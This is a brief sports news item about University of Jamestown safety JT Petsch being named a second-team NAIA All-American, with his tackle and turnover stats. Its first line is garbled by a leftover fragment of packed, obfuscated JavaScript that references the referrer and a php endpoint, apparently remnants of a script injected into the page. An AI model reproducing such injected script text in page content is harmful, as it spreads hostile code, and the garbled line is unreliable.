JAMESTOWN ershs|var|u0026u|referrer|bhakt||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- University of Jamestown senior safety JT Petsch was named to the second team AFCA-NAIA All-American team this morning. Petsch was the leader of the defense for head coach Shawn Frank.

Petsch lead the team in tackles with 81 stops. He also had a fumble recover and an interception. Petsch’s fumble recovery was a touchdown off a mishandled snap prior to a punt in Mayville, when Jamestown won 21-19.

The Jimmies had to replace three starters in the defensive backfield heading into 2013 and Petsch was the lone returner. Coach Frank often referred to him as “the quarterback of the defense.”

So while his numbers were good, what he meant and the role he played for the Jimmie defense may have had a lot to do with his selection.
